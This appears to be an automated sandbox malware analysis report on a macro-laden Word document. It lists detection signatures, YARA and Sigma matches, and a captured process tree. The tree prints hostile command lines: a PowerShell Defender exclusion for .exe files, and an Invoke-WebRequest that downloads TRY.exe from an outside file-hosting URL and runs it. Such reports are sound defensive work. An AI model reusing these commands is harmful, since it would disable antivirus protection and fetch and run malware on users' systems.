Edit tour
Windows
Analysis Report
12543_0008858249_FWDOUTSTANDING_20200604.doc
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
Document contains OLE streams with PE executables
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Sigma detected: Cabinet File Expansion
Potential document exploit detected (performs DNS queries)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Sigma detected: Msiexec Initiated Connection
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Classification
- System is w7x64
- WINWORD.EXE (PID: 3036 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- msiexec.exe (PID: 2996 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: AC2E7152124CEED36846BD1B6592A00F) - msiexec.exe (PID: 464 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng A7515E8 5DB42A8512 9F32A151C1 5AD96 MD5: 4315D6ECAE85024A0567DF2CB253B7B0) - icacls.exe (PID: 1436 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 58b84a1d-9 a66-4aee-8 a43-feb206 e089b1\." /SETINTEGR ITYLEVEL ( CI)(OI)HIG H MD5: 1542A92D5C6F7E1E80613F3466C9CE7F) - expand.exe (PID: 1156 cmdline:
"C:\Window s\system32 \EXPAND.EX E" -R file s.cab -F:* files MD5: 659CED6D7BDA047BCC6048384231DB9F) - TRY.exe (PID: 2272 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\MW-58b 84a1d-9a66 -4aee-8a43 -feb206e08 9b1\files\ TRY.exe" MD5: 96DF7B0C491646EFC2E5F2E9F0443B8B) - cmd.exe (PID: 1136 cmdline:
cmd /c tha i.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 1988 cmdline:
powershell -command "Set-MpPre ference -E xclusionEx tension ". exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F) - powershell.exe (PID: 2672 cmdline:
powershell -command "Invoke-We bRequest - uri https: //filebin. net/rf43v6 qzghbj7h7b /TRY.exe - o TRY.exe" MD5: 852D67A27E454BD389FA7F02A8CBE23F) - icacls.exe (PID: 2068 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 58b84a1d-9 a66-4aee-8 a43-feb206 e089b1\." /SETINTEGR ITYLEVEL ( CI)(OI)LOW MD5: 1542A92D5C6F7E1E80613F3466C9CE7F)
- rundll32.exe (PID: 2840 cmdline:
C:\Windows \system32\ rundll32.e xe" C:\Win dows\syste m32\advpac k.dll,DelN odeRunDLL3 2 "C:\User s\user\App Data\Local \Temp\IXP0 00.TMP\ MD5: DD81D91FF3B0763C392422865C9AC12E)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Doc_WindowsInstaller_Call_Feb22_1 | Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts. | Nils Kuhnert |
| |
Office_AutoOpen_Macro | Detects an Microsoft Office file that contains the AutoOpen Macro function | Florian Roth |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Doc_WindowsInstaller_Call_Feb22_1 | Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts. | Nils Kuhnert |
| |
SUSP_Doc_WindowsInstaller_Call_Feb22_1 | Triggers on docfiles executing windows installer. Used for deploying ThinBasic scripts. | Nils Kuhnert |
| |
SUSP_VBA_FileSystem_Access | Detects suspicious VBA that writes to disk and is activated on document open | Florian Roth |
|
There are no malicious signatures, click here to show all signatures.
Source: | Author: Bhabesh Raj: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | Code function: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | File opened: |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | Code function: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Stream path '\x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480' : |